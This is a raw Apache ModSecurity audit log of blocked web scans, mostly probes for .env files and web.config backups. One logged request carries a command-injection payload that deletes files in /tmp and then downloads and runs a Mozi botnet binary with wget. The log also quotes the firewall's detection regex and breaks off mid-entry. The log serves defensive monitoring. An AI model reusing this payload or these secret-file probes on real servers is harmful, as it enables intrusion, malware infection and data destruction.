Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa19906-Z-- --2a641164-A-- [22/Apr/2025:16:57:27 +0700] aAdoBy3NG0xEq1F63-IpuQAAAEA 103.236.140.4 59286 103.236.140.4 8181 --2a641164-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.120 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --2a641164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a641164-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745315847613969 751 (- - -) Stopwatch2: 1745315847613969 751; combined=271, p1=239, p2=0, p3=0, p4=0, p5=31, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a641164-Z-- --8a43447e-A-- [22/Apr/2025:17:25:34 +0700] aAdunl9gRrTzIZGIAfkvkQAAAJU 103.236.140.4 52812 103.236.140.4 8181 --8a43447e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --8a43447e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a43447e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745317534784617 13285 (- - -) Stopwatch2: 1745317534784617 13285; combined=25231, p1=334, p2=0, p3=0, p4=0, p5=12464, sr=121, sw=0, l=0, gc=12433 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a43447e-Z-- --93acfc24-A-- [22/Apr/2025:17:26:48 +0700] aAdu6M0DNRaK3AYHswIbdQAAAAE 103.236.140.4 56594 103.236.140.4 8181 --93acfc24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36 Accept-Charset: utf-8 --93acfc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93acfc24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745317608414862 857 (- - -) Stopwatch2: 1745317608414862 857; combined=361, p1=324, p2=0, p3=0, p4=0, p5=36, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93acfc24-Z-- --21e1dd47-A-- [22/Apr/2025:17:31:53 +0700] aAdwGa3OiIHZ_gUDzTt3fwAAANQ 103.236.140.4 44096 103.236.140.4 8181 --21e1dd47-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept-Charset: utf-8 --21e1dd47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21e1dd47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745317913817775 847 (- - -) Stopwatch2: 1745317913817775 847; combined=367, p1=325, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21e1dd47-Z-- --87568250-A-- [22/Apr/2025:17:50:26 +0700] aAd0cq3OiIHZ_gUDzTuEpwAAAM0 103.236.140.4 44050 103.236.140.4 8181 --87568250-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --87568250-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87568250-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745319026349385 832 (- - -) Stopwatch2: 1745319026349385 832; combined=295, p1=260, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87568250-Z-- --ca65e84a-A-- [22/Apr/2025:18:55:31 +0700] aAeDs80DNRaK3AYHswJNPAAAAAQ 103.236.140.4 47210 103.236.140.4 8181 --ca65e84a-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ca65e84a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca65e84a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745322931892185 778 (- - -) Stopwatch2: 1745322931892185 778; combined=341, p1=303, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca65e84a-Z-- --8073f329-A-- [22/Apr/2025:19:43:44 +0700] aAePAM0DNRaK3AYHswJSFQAAABY 103.236.140.4 33684 103.236.140.4 8181 --8073f329-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.230.19.140 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --8073f329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8073f329-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745325824103117 796 (- - -) Stopwatch2: 1745325824103117 796; combined=325, p1=282, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8073f329-Z-- --87527603-A-- [22/Apr/2025:19:45:07 +0700] aAePUy3NG0xEq1F63-JxSAAAAEo 103.236.140.4 34132 103.236.140.4 8181 --87527603-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 77.239.222.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 77.239.222.139 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --87527603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87527603-E-- --87527603-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://192.168.1.1:8088/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745325907055924 2130 (- - -) Stopwatch2: 1745325907055924 2130; combined=678, p1=427, p2=220, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87527603-Z-- --27cf7813-A-- [22/Apr/2025:19:45:24 +0700] aAePZM0DNRaK3AYHswJSNQAAABI 103.236.140.4 34218 103.236.140.4 8181 --27cf7813-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 Accept-Charset: utf-8 --27cf7813-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27cf7813-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745325924249188 816 (- - -) Stopwatch2: 1745325924249188 816; combined=380, p1=344, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27cf7813-Z-- --3b90ea7f-A-- [22/Apr/2025:20:48:44 +0700] aAeePF9gRrTzIZGIAflmjQAAAIs 103.236.140.4 60522 103.236.140.4 8181 --3b90ea7f-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 165.227.84.14 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3b90ea7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b90ea7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745329724904801 826 (- - -) Stopwatch2: 1745329724904801 826; combined=299, p1=262, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b90ea7f-Z-- --068d3b12-A-- [22/Apr/2025:21:03:59 +0700] aAehz19gRrTzIZGIAflnhwAAAIo 103.236.140.4 36652 103.236.140.4 8181 --068d3b12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.69.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.69.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --068d3b12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --068d3b12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745330639073557 816 (- - -) Stopwatch2: 1745330639073557 816; combined=353, p1=317, p2=0, p3=0, p4=0, p5=36, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --068d3b12-Z-- --b7e7b666-A-- [22/Apr/2025:21:14:13 +0700] aAekNc0DNRaK3AYHswJb3AAAABg 103.236.140.4 39056 103.236.140.4 8181 --b7e7b666-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.168 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --b7e7b666-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7e7b666-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745331253139683 931 (- - -) Stopwatch2: 1745331253139683 931; combined=461, p1=342, p2=0, p3=0, p4=0, p5=119, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7e7b666-Z-- --fc44ba55-A-- [22/Apr/2025:21:22:08 +0700] aAemEM0DNRaK3AYHswJcQAAAAAs 103.236.140.4 40994 103.236.140.4 8181 --fc44ba55-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --fc44ba55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc44ba55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745331728791381 734 (- - -) Stopwatch2: 1745331728791381 734; combined=295, p1=262, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc44ba55-Z-- --69fa9f74-A-- [22/Apr/2025:21:52:01 +0700] aAetEc0DNRaK3AYHswJeIAAAABM 103.236.140.4 48240 103.236.140.4 8181 --69fa9f74-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 64.225.75.246 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --69fa9f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69fa9f74-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745333521024501 766 (- - -) Stopwatch2: 1745333521024501 766; combined=276, p1=242, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69fa9f74-Z-- --3dc02753-A-- [22/Apr/2025:23:01:29 +0700] aAe9WV9gRrTzIZGIAflv2gAAAIM 103.236.140.4 39866 103.236.140.4 8181 --3dc02753-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 68.183.180.73 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 68.183.180.73 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3dc02753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dc02753-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745337689524598 708 (- - -) Stopwatch2: 1745337689524598 708; combined=283, p1=247, p2=0, p3=0, p4=0, p5=36, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dc02753-Z-- --a9f8cc72-A-- [22/Apr/2025:23:19:51 +0700] aAfBpy3NG0xEq1F63-KCCAAAAEQ 103.236.140.4 44436 103.236.140.4 8181 --a9f8cc72-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 146.190.242.161 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 146.190.242.161 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a9f8cc72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9f8cc72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745338791499180 831 (- - -) Stopwatch2: 1745338791499180 831; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9f8cc72-Z-- --b01da02c-A-- [23/Apr/2025:00:33:00 +0700] aAfSzC3NG0xEq1F63-KGbAAAAFA 103.236.140.4 33454 103.236.140.4 8181 --b01da02c-B-- GET /web.config.zip HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --b01da02c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b01da02c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343180532944 663 (- - -) Stopwatch2: 1745343180532944 663; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b01da02c-Z-- --83bc3c75-A-- [23/Apr/2025:00:33:14 +0700] aAfS2s0DNRaK3AYHswJqYAAAAAs 103.236.140.4 33542 103.236.140.4 8181 --83bc3c75-B-- GET /web.config.rar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --83bc3c75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83bc3c75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343194797269 750 (- - -) Stopwatch2: 1745343194797269 750; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83bc3c75-Z-- --c852667b-A-- [23/Apr/2025:00:33:29 +0700] aAfS6a3OiIHZ_gUDzTu7WQAAAM8 103.236.140.4 33626 103.236.140.4 8181 --c852667b-B-- GET /web.config.7z HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --c852667b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c852667b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745343209271477 696 (- - -) Stopwatch2: 1745343209271477 696; combined=292, p1=254, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c852667b-Z-- --7a8d9168-A-- [23/Apr/2025:00:33:43 +0700] aAfS9y3NG0xEq1F63-KGgwAAAE8 103.236.140.4 33710 103.236.140.4 8181 --7a8d9168-B-- GET /web.config.tar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 51.222.138.15 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 51.222.138.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --7a8d9168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a8d9168-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file 